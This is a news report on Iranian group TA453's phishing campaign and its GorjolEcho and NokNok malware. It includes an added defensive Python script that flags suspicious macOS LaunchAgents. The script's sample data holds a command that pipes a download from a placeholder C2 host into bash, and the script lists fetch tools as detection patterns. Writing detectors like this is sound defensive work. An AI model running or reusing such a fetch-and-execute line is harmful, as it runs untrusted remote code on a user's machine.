Iranian APT Targets Both Windows and Mac Victims


TA453, an Iranian nation-state actor, has been connected to a fresh wave of spear-phishing attacks that infect Windows and macOS operating systems with malicious software.

According to a recent report from Proofpoint, TA453 employed various cloud hosting providers to execute a new infection chain, deploying a newly identified PowerShell backdoor called GorjolEcho.

Furthermore, TA453 expanded its tactics by attempting to launch an Apple-oriented infection chain called NokNok and employed multi-persona impersonation in its relentless pursuit of espionage.

Threat Actor's Past Exploits

This threat group, also known as APT35, Charming Kitten, Mint Sandstorm, and Yellow Garuda, has ties to Iran's Islamic Revolutionary Guard Corps (IRGC) and has been active since at least 2011. Volexity recently revealed their usage of an updated version of the PowerShell implant CharmPower (also known as GhostEcho or POWERSTAR).

In a recent attack observed by an enterprise security firm in May 2023, TA453 sent phishing emails to a nuclear security expert at a U.S.-based think tank focused on foreign affairs. These emails contained a malicious link to a Google Script macro, which redirected the target to a Dropbox URL hosting a RAR archive.

Within this file, an LNK dropper initiated a multi-stage process that ultimately deployed GorjolEcho. This backdoor displayed a decoy PDF document while secretly waiting for next-stage payloads from a remote server. However, upon discovering that the target was using an Apple computer, TA453 modified its approach. They sent a second email with a ZIP archive containing a Mach-O binary disguised as a VPN application. In reality, this binary was an AppleScript that connected to a remote server to download a Bash script-based backdoor known as NokNok.

NokNok, in turn, retrieved up to four modules capable of gathering information on running processes, installed applications, system metadata, and establishing persistence through LaunchAgents.
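As an added, defender-side example (not code from the article or from Proofpoint's report), the Python routine below triages macOS LaunchAgent plists for the persistence shape described above: an agent whose launcher is a shell or script interpreter and whose command line also fetches remote content or pipes it into an interpreter. The sample plists, labels and URL are constructed placeholders.

```python
import plistlib
from os.path import basename
from typing import Dict, List, Tuple

# Constructed sample plists (not real NokNok artifacts); labels and URL are placeholders.
_HDR = b'<?xml version="1.0" encoding="UTF-8"?>\n<plist version="1.0"><dict>'
SAMPLE_AGENTS: Dict[str, bytes] = {
    # Shell launcher that pulls a remote script and pipes it into bash at login.
    "com.placeholder.vpnhelper.plist": _HDR + b"""
  <key>Label</key><string>com.placeholder.vpnhelper</string>
  <key>ProgramArguments</key><array>
    <string>/bin/bash</string><string>-c</string>
    <string>curl -fsSL http://c2.placeholder.invalid/stage | bash</string>
  </array>
  <key>RunAtLoad</key><true/>
</dict></plist>""",
    # Vendor binary run directly: no interpreter, no network fetch.
    "com.vendor.sync.plist": _HDR + b"""
  <key>Label</key><string>com.vendor.sync</string>
  <key>ProgramArguments</key><array>
    <string>/Applications/Sync.app/Contents/MacOS/sync-agent</string>
    <string>--background</string>
  </array>
  <key>RunAtLoad</key><true/>
</dict></plist>""",
}

SHELL_LAUNCHERS = {"bash", "sh", "zsh", "osascript"}
FETCH_TOOLS = ("curl ", "wget ", "nscurl ")

def triage_agents(agents: Dict[str, bytes]) -> List[Tuple[str, List[str]]]:
    """Flag agents whose launcher is a shell/script interpreter and whose
    command line also fetches remote content or pipes it into an interpreter."""
    findings = []
    for name, raw in agents.items():
        plist = plistlib.loads(raw)
        args = list(plist.get("ProgramArguments", []))
        if plist.get("Program"):          # Program is an alternative to argv[0]
            args.insert(0, plist["Program"])
        if not args:
            continue
        cmdline = " ".join(args)
        reasons = []
        if any(tool in cmdline for tool in FETCH_TOOLS):
            reasons.append("remote fetch in command line")
        if "| bash" in cmdline or "| sh" in cmdline or "| zsh" in cmdline:
            reasons.append("fetched content piped into an interpreter")
        if basename(args[0]) in SHELL_LAUNCHERS and reasons:
            findings.append((name, reasons))
    return findings
```

On a live host the same function can be fed the contents of `~/Library/LaunchAgents` and `/Library/LaunchAgents`; a hit is a starting point for review, not proof of compromise, since some legitimate tooling also uses shell launchers.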

These modules shared significant functionality with the modules associated with CharmPower, and NokNok exhibited similarities in source code to macOS malware previously attributed to the TA453 group in 2017.

The threat actor also utilized a fraudulent file-sharing website, likely as a means to fingerprint visitors and track successful victims.

July 7, 2023
